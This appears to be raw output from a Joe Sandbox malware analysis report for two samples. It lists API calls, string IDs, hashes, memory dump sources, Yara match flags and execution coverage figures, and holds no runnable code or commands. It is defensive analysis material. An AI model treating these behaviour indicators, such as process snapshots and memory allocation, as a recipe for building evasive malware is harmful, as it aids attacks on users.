                                                                                                                                                                                                                                            • Instruction ID: 71e6de1c8af28f534afd96217d060265c7bf952bbd0c624222ea3419adf54434
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf5c7426e44f0e531d76730010d1233fe0a142eb59a03d1d9f3b17062cc15993
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2AE0CD34500115578714BB755D0AABF72587901719B600B1AF131D20D1FB6CD458429C
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::critical_section::unlock.LIBCMT ref: 024A2103
                                                                                                                                                                                                                                              • Part of subcall function 024A1379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024A139A
                                                                                                                                                                                                                                              • Part of subcall function 024A1379: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 024A13D1
                                                                                                                                                                                                                                              • Part of subcall function 024A1379: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 024A13DD
                                                                                                                                                                                                                                            • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 024A210F
                                                                                                                                                                                                                                              • Part of subcall function 024A0CEA: Concurrency::critical_section::unlock.LIBCMT ref: 024A0D0E
                                                                                                                                                                                                                                            • Concurrency::Context::Block.LIBCONCRT ref: 024A2114
                                                                                                                                                                                                                                              • Part of subcall function 024A2EC8: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 024A2ECA
                                                                                                                                                                                                                                            • Concurrency::critical_section::lock.LIBCONCRT ref: 024A2134
                                                                                                                                                                                                                                              • Part of subcall function 024A12A2: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 024A12B0
                                                                                                                                                                                                                                              • Part of subcall function 024A12A2: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 024A12BD
                                                                                                                                                                                                                                              • Part of subcall function 024A12A2: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 024A12C8
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
• String ID:
• API String ID: 3659872527-0
• Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
• Instruction ID: a24951516481356b312b25766a7e9b34049d069ee6d3c0965160161cd05c5ee3
• Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
• Instruction Fuzzy Hash: B1E01A355005069BCB09FB62C56059CBB62BF95310B54424A946A972A0CF646A4ADF94
APIs
• Concurrency::critical_section::unlock.LIBCMT ref: 00411E9C
  • Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00411133
  • Part of subcall function 00411112: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 0041116A
  • Part of subcall function 00411112: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00411176
• Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00411EA8
  • Part of subcall function 00410A83: Concurrency::critical_section::unlock.LIBCMT ref: 00410AA7
• Concurrency::Context::Block.LIBCONCRT ref: 00411EAD
  • Part of subcall function 00412C61: Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00412C63
• Concurrency::critical_section::lock.LIBCONCRT ref: 00411ECD
  • Part of subcall function 0041103B: Concurrency::details::LockQueueNode::LockQueueNode.LIBCONCRT ref: 00411049
  • Part of subcall function 0041103B: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00411056
  • Part of subcall function 0041103B: Concurrency::critical_section::_Switch_to_active.LIBCMT ref: 00411061
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: Concurrency::details::LockQueue$NodeNode::$Concurrency::critical_section::_Concurrency::critical_section::unlockNextWait$Acquire_lockBase::BlockConcurrency::Concurrency::critical_section::lockConcurrency::details::_ContextContext::CurrentDerefLock::_ReaderSchedulerScoped_lockScoped_lock::~_Switch_to_activeTimerWriter
• String ID:
• API String ID: 3659872527-0
• Opcode ID: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
• Instruction ID: 9d2f70e3251d3db540e969485d70697033c14617760f295063863c07ed990fb6
• Opcode Fuzzy Hash: 82de0933dc6785f3946ddc0ad7c0081e97ef1b3c93ec0f171fb3e506e287e00c
• Instruction Fuzzy Hash: BCE0DF34500502ABCB08FB21C5A25ECFB61BF88354B50821FE462432E2CF785E87DB88
APIs
• __startOneArgErrorHandling.LIBCMT ref: 0042F10D
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorHandling__start
• String ID: pow
• API String ID: 3213639722-2276729525
• Opcode ID: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
• Instruction ID: 9c0c3c151ae2a5a6b50f0fee57114a4457493f87fddc68121f24b850b116d2d7
• Opcode Fuzzy Hash: cb57d0990ecd4e157a276670056fa63ecf5c6ef3cb6d4436f05d56c4fa4236c6
• Instruction Fuzzy Hash: 8C515D61B04302D6DB117714E90137BABA0EB54B40FE4597FF491813E9EE3D8CAA9A4F
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,024CB32B,?,00000050,?,?,?,?,?), ref: 024CB1AB
Strings
Memory Dump Source
• Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
Yara matches
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
• Instruction ID: 881f8b524cf696cebf662c0ab2fbeb5e74a2be9ad5acf937dfd872c3db22ddc7
• Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
• Instruction Fuzzy Hash: 9B21A96AA40105A6DBA68F5D8D037A7735AEF40BECF66812EE909D7304EF32D941C390
APIs
• GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0043B0C4,?,00000050,?,?,?,?,?), ref: 0043AF44
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID:
• String ID: ACP$OCP
• API String ID: 0-711371036
• Opcode ID: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
• Instruction ID: 14488b359d73a2b35151aaad325e7c1d9f20b01c06d3923b8e2598dc1437a59e
• Opcode Fuzzy Hash: 3d3d09a8c43a337bc5f8b6bf8185eed6c30071c5532ceeb821c98544ef4eef7c
• Instruction Fuzzy Hash: F3212BA2AC4101A6DB30CB54C907B977366EF5CB11F569526E98AC7300F73ADD11C39E
APIs
• GdipGetImageEncodersSize.GDIPLUS(?,?), ref: 00401F25
• GdipGetImageEncoders.GDIPLUS(?,?,00000000), ref: 00401F4A
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: EncodersGdipImage$Size
• String ID: image/png
• API String ID: 864223233-2966254431
• Opcode ID: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
• Instruction ID: a861e299a60b9ced5094bb1731eec5177a5b987cbaa8a1425c649574426e8627
• Opcode Fuzzy Hash: a4116aea5856e167c2c377b93ae464baf6efd33a5122bb5b4e0eea2d33bbdf28
• Instruction Fuzzy Hash: 04119476D00109FFCB01AFA99C8149EBB76FE41321B60027BE810B21E0C7755F419A58
APIs
• SetLastError.KERNEL32(0000000D,?,0040DE41,0040C659,?,?,00000000,?,0040C529,0045D5E4,0040C4F6,0045D5DC,?,ios_base::failbit set,0040C659), ref: 0040EFAA
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ErrorLast
• String ID: F(@
• API String ID: 1452528299-2698495834
• Opcode ID: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
• Instruction ID: 02fe8a739a07683bc60ca74788e4bb9a0325118a5e4d2b20450d6bc28493fa7e
• Opcode Fuzzy Hash: 28a02ce365c990727b7b4e8bf51613b6bc71088fada4a4c5b2d2716d252c928d
• Instruction Fuzzy Hash: 2B11C236300216BFCF165F66DD4496AB765BB08B11B11483AFA05A6290CA7498219BD9
APIs
• ___std_exception_destroy.LIBVCRUNTIME ref: 0040C554
Strings
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ___std_exception_destroy
• String ID: F(@$ios_base::failbit set
• API String ID: 4194217158-1828034088
• Opcode ID: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                            • Instruction ID: 4ba2cac2fce41df0eb0aef52a6a00c17a8a4a8275336f9ee0f9be7dda5d805c6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 326c062bbd77b351e70a003f48f611e5e8c7415ec1b2fbce5622d8111c151cd5
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 27F0B472A0022836D2302B56BC02B97F7CC8F50B69F14443FFE05A6681EBF8A94581EC
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: H_prolog3_catch
                                                                                                                                                                                                                                            • String ID: MOC$RCC
                                                                                                                                                                                                                                            • API String ID: 3886170330-2084237596
                                                                                                                                                                                                                                            • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                            • Instruction ID: e9e4e095770ca636dcca3efe7f5224ff47edcbfbbe98bab9d98b6a8866433d4c
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 81F0AF70600224CFDB22AF95D40159D3B60AF82748F8281A7F9009B262C73C6E14CFAE
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Locinfo::_Locinfo.LIBCPMT ref: 00404E3C
                                                                                                                                                                                                                                              • Part of subcall function 0040BF5D: std::_Lockit::_Lockit.LIBCPMT ref: 0040BF71
                                                                                                                                                                                                                                              • Part of subcall function 0040BF5D: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040BFAE
                                                                                                                                                                                                                                            • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00404E50
                                                                                                                                                                                                                                              • Part of subcall function 0040C008: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 0040C02F
                                                                                                                                                                                                                                              • Part of subcall function 0040C008: std::_Lockit::~_Lockit.LIBCPMT ref: 0040C0A0
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: std::_$Locinfo::_$LocinfoLockit$Locinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_
                                                                                                                                                                                                                                            • String ID: F@
                                                                                                                                                                                                                                            • API String ID: 2118720939-885931407
                                                                                                                                                                                                                                            • Opcode ID: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                            • Instruction ID: 13870e84e441ff14f0459789a428ac9660f365acd1e629d5c6e8dadf1a096d8e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab390ea3e88c8ea055363ab8ec40643519a30a11bb7225da03181527fb8750d3
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CF034B2410205DAEB21AF50C412B9973B4BF80B15F61813FE545AB2C1DB786949CB89
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::__non_rtti_object::__construct_from_string_literal.LIBVCRUNTIME ref: 00428D83
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 00428DAA
                                                                                                                                                                                                                                              • Part of subcall function 0042860D: RaiseException.KERNEL32(?,?,0040D87E,00000000,00000000,00000000,00000000,?,?,?,?,0040D87E,00000000,0045617C,00000000), ref: 0042866D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Access violation - no RTTI data!, xrefs: 00428D7A
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ExceptionException@8RaiseThrowstd::__non_rtti_object::__construct_from_string_literal
                                                                                                                                                                                                                                            • String ID: Access violation - no RTTI data!
                                                                                                                                                                                                                                            • API String ID: 2053020834-2158758863
                                                                                                                                                                                                                                            • Opcode ID: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                            • Instruction ID: 6523df8e39b2e501409064d37ec9e65ca05e1b8799177bf407a1bfc54a05c872
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f465db51e5b26baf5defdc7598b1b5016ca783533df98e5f879df06e94262f84
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 28E0DF726993185A9A04D6A1B846CDE73EC9E24300BA0001FF900920C2EE2DF918826D
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • Concurrency::details::InternalContextBase::~InternalContextBase.LIBCONCRT ref: 0042382E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ContextInternal$BaseBase::~Concurrency::details::
                                                                                                                                                                                                                                            • String ID: zB$~B
                                                                                                                                                                                                                                            • API String ID: 3275300208-395995950
                                                                                                                                                                                                                                            • Opcode ID: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                            • Instruction ID: f55228a66ce0378ecda15d2e29e2cf9b619ecd1f8f2314d3bfe00ef4b4db5243
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a1da6c89fa2dfd945bd02a2cb13c6e7ff4bb2a0d62993eedb0658c40d2c20ec7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83D05B7124C32525E2256A4974057857AD84B01764F50803FF94456682CBB9654442DC
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::invalid_argument::invalid_argument.LIBCONCRT ref: 004212DB
                                                                                                                                                                                                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 004212E9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                            • String ID: pThreadProxy
                                                                                                                                                                                                                                            • API String ID: 1687795959-3651400591
                                                                                                                                                                                                                                            • Opcode ID: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                            • Instruction ID: be918fe35ab2875efcd6209978594ad56e839e7639c00e6f4a717d1a784130ad
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a6860d66e6dfc760da51a725ddbc90d8fa67c7294f8bcc7dcd6806e1c2d97e2b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DED05B71E0020856D700E7B6D806F9F77A85B10708F50427B7D14E6186DB79E50886AC
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,02492AAD,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,02492AAD,00000000), ref: 024BB187
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 024BB195
                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,02492AAD,00000000), ref: 024BB1F0
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1717984340-0
APIs
• MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000,00000000,00000000,F(@,00000000), ref: 0042AF20
• GetLastError.KERNEL32 ref: 0042AF2E
• MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000), ref: 0042AF89
Memory Dump Source
• Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
Similarity
• API ID: ByteCharMultiWide$ErrorLast
• String ID:
• API String ID: 1717984340-0

Execution Graph

Execution Coverage: 2.2%
Dynamic/Decrypted Code Coverage: 40.6%
Signature Coverage: 20.3%
Total number of Nodes: 69
Total number of Limit Nodes: 5

Control-flow Graph

APIs
• GetCurrentProcessId.KERNEL32 ref: 004087B4
• GetCurrentThreadId.KERNEL32 ref: 004087BE
• SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0040885B
• GetForegroundWindow.USER32 ref: 00408870
• ExitProcess.KERNEL32 ref: 00408972
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
• String ID:
• API String ID: 4063528623-0

Control-flow Graph

control_flow_graph 326 43a9b0-43a9e2 LdrInitializeThunk
APIs
• LdrInitializeThunk.NTDLL(0043C978,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043A9DE
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID:
• API String ID: 2994545307-0
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: InitializeThunk
• String ID: ihgf
• API String ID: 2994545307-2948842496
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID:
• String ID:
• API String ID:
                                                                                                                                                                                                                                            • Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                            • Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

Control-flow Graph
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0249024D
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID: AllocVirtual
• String ID: cess$kernel32.dll
• API String ID: 4275171209-1230238691
• Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
• Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
• Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14

Control-flow Graph
APIs
• GetForegroundWindow.USER32 ref: 0043AB9F
Strings
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: ForegroundWindow
• String ID: ilmn
• API String ID: 2020703349-1560153188
• Opcode ID: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
• Instruction ID: 381210f78ea322f673374cf03a2ab6eba84d6d5afac1efb59df7821204f613f6
• Opcode Fuzzy Hash: 8bf5be419e97d4aeba59362ee4405b63177e9ea72d340c76fc1dbd34a7535713
• Instruction Fuzzy Hash: A0115C3BE5A65087D304DB65D806156B293EAC5214F0DD53DC986D770AEF3DDC028286

Control-flow Graph
APIs
• CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 008F9186
• Module32First.KERNEL32(00000000,00000224), ref: 008F91A6
Memory Dump Source
• Source File: 00000003.00000002.1759184300.00000000008F8000.00000040.00000020.00020000.00000000.sdmp, Offset: 008F8000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_8f8000_91B1.jbxd
Yara matches
Similarity
• API ID: CreateFirstModule32SnapshotToolhelp32
• String ID:
• API String ID: 3833638111-0
• Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction ID: 65bbabaa9c758668528bb7ba6b3224d7fdb95344ad48145c67d289bccf4ac8d6
• Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
• Instruction Fuzzy Hash: 40F0623520071A6BD7202AB9A88DB7F76E8FF49725F100538E782D10C0DA74EC858A61

Control-flow Graph
APIs
• SetErrorMode.KERNELBASE(00000400,?,?,02490223,?,?), ref: 02490E19
• SetErrorMode.KERNELBASE(00000000,?,?,02490223,?,?), ref: 02490E1E
Memory Dump Source
• Source File: 00000003.00000002.1759508061.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2490000_91B1.jbxd
Yara matches
Similarity
• API ID: ErrorMode
• String ID:
• API String ID: 2340568224-0
• Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction ID: 222b95ba1efed397dc51e845e48fe434b558f4b478ecd050a5280b6dec76a593
• Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
• Instruction Fuzzy Hash: 20D0123514512877DB002A94DC09BCE7F1CDF05B66F008011FB0DD9180C770954046E5

Control-flow Graph
APIs
• GetForegroundWindow.USER32 ref: 0043AB9F
Memory Dump Source
• Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_91B1.jbxd
Yara matches
Similarity
• API ID: ForegroundWindow
• String ID:
• API String ID: 2020703349-0
• Opcode ID: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
• Instruction ID: 60e8b0f46bfb036eff5fe615915129b1fb2bd173e47bf556a6606a5c449cc706
• Opcode Fuzzy Hash: a0dc0220c6c2ddb49d889c1027b5b2c34b58d9f1c75a0e80b2e5e3c572fe071b
• Instruction Fuzzy Hash: 34E08C7EA406008BDB04DF20EC4A5517766B79A305B084039D903C37A6DB3DD816CA49

Control-flow Graph
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RtlFreeHeap.NTDLL(?,00000000,?,004127C7), ref: 00438E8E
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000003.00000002.1758855878.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000003.00000002.1758855878.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_400000_91B1.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeHeap
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3298025750-0
                                                                                                                                                                                                                                            • Opcode ID: 768fcb1c02373f70ae0863a28d25f36a016012181a68bd02bcb189957d430873
